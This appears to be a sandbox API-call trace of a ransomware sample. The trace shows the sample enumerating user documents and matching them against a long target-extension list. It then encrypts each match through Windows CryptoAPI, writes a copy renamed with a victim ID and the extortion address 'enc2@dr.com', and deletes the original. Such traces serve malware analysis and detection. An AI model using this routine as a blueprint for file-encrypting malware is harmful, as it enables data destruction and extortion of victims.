	[0189.200] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\deo9rsf3b2dx88.xls.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 132
	[0189.200] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\deo9rsf3b2dx88.xls.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\deo9rsf3b2dx88.xls.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0189.202] WriteFile (in: hFile=0x390, lpBuffer=0xff1790*, nNumberOfBytesToWrite=0x14610, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xff1790*, lpNumberOfBytesWritten=0x18a648*=0x14610, lpOverlapped=0x0) returned 1
	[0189.222] CloseHandle (hObject=0x390) returned 1
	[0189.222] CloseHandle (hObject=0x388) returned 1
	[0189.223] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\deo9rsf3b2dx88.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\deo9rsf3b2dx88.xls")) returned 1
	[0189.231] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\deo9rsf3b2dx88.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\deo9rsf3b2dx88.xls")) returned 0
	[0189.231] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x501a3c70, ftCreationTime.dwHighDateTime=0x1d96c15, ftLastAccessTime.dwLowDateTime=0xaf373b40, ftLastAccessTime.dwHighDateTime=0x1d97138, ftLastWriteTime.dwLowDateTime=0xaf373b40, ftLastWriteTime.dwHighDateTime=0x1d97138, nFileSizeHigh=0x0, nFileSizeLow=0x105f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="DzWk6XA.odt", cAlternateFileName="")) returned 1
	[0189.232] lstrcmpW (lpString1="DzWk6XA.odt", lpString2="..") returned 1
	[0189.232] lstrcmpW (lpString1="DzWk6XA.odt", lpString2=".") returned 1
	[0189.232] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\"
	[0189.232] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\", lpString2="DzWk6XA.odt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\DzWk6XA.odt") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\DzWk6XA.odt"
	[0189.232] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\DzWk6XA.odt") returned 83
	[0189.232] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0189.232] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\DzWk6XA.odt", cchLength=0x53 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\dzwk6xa.odt") returned 0x53
	[0189.233] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.233] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\dzwk6xa.odt", lpSrch="help_decrypt_your_files") returned 0x0
	[0189.233] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\dzwk6xa.odt" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\dzwk6xa.odt") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\dzwk6xa.odt"
	[0189.233] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\dzwk6xa.odt") returned 83
	[0189.233] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.233] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.234] StrStrW (lpFirst=".odt", lpSrch=".") returned=".odt"
	[0189.234] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.234] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".odt") returned=".odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0189.234] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0189.235] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0189.235] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\dzwk6xa.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\dzwk6xa.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0189.239] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x105f9, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x105f9, lpOverlapped=0x0) returned 1
	[0189.243] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.243] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcae68) returned 1
	[0189.246] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.246] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0189.246] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.246] CryptHashData (hHash=0xfb8ff0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0189.246] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.246] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb8ff0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9670) returned 1
	[0189.247] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.247] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x105f9, dwBufLen=0x105f9 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x10600) returned 1
	[0189.248] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.249] RtlMoveMemory (in: Destination=0xfed788, Source=0xfdd180, Length=0x105f9 | out: Destination=0xfed788) 
	[0189.249] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.249] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfed788*, pdwDataLen=0x18a1ec*=0x105f9, dwBufLen=0x10600 | out: pbData=0xfed788*, pdwDataLen=0x18a1ec*=0x10600) returned 1
	[0189.251] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.252] CryptDestroyKey (hKey=0xfb9670) returned 1
	[0189.252] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.252] CryptDestroyHash (hHash=0xfb8ff0) returned 1
	[0189.308] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.309] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0189.309] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.309] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0189.310] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.310] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0189.311] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\dzwk6xa.odt.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 125
	[0189.311] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\dzwk6xa.odt.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\dzwk6xa.odt.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0189.312] WriteFile (in: hFile=0x390, lpBuffer=0xfed788*, nNumberOfBytesToWrite=0x10600, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfed788*, lpNumberOfBytesWritten=0x18a648*=0x10600, lpOverlapped=0x0) returned 1
	[0189.320] CloseHandle (hObject=0x390) returned 1
	[0189.321] CloseHandle (hObject=0x388) returned 1
	[0189.321] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\dzwk6xa.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\dzwk6xa.odt")) returned 1
	[0189.329] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\dzwk6xa.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\dzwk6xa.odt")) returned 0
	[0189.329] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf32724e0, ftCreationTime.dwHighDateTime=0x1d96e78, ftLastAccessTime.dwLowDateTime=0xacc8eb70, ftLastAccessTime.dwHighDateTime=0x1d97119, ftLastWriteTime.dwLowDateTime=0xacc8eb70, ftLastWriteTime.dwHighDateTime=0x1d97119, nFileSizeHigh=0x0, nFileSizeLow=0xe534, dwReserved0=0x0, dwReserved1=0x0, cFileName="FvlV d.odt", cAlternateFileName="FVLVD~1.ODT")) returned 1
	[0189.329] lstrcmpW (lpString1="FvlV d.odt", lpString2="..") returned 1
	[0189.329] lstrcmpW (lpString1="FvlV d.odt", lpString2=".") returned 1
	[0189.330] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\"
	[0189.330] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\", lpString2="FvlV d.odt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\FvlV d.odt") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\FvlV d.odt"
	[0189.330] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\FvlV d.odt") returned 82
	[0189.330] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0189.336] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\FvlV d.odt", cchLength=0x52 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\fvlv d.odt") returned 0x52
	[0189.336] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.336] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\fvlv d.odt", lpSrch="help_decrypt_your_files") returned 0x0
	[0189.336] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\fvlv d.odt" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\fvlv d.odt") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\fvlv d.odt"
	[0189.336] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\fvlv d.odt") returned 82
	[0189.336] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.337] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.337] StrStrW (lpFirst=".odt", lpSrch=".") returned=".odt"
	[0189.337] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
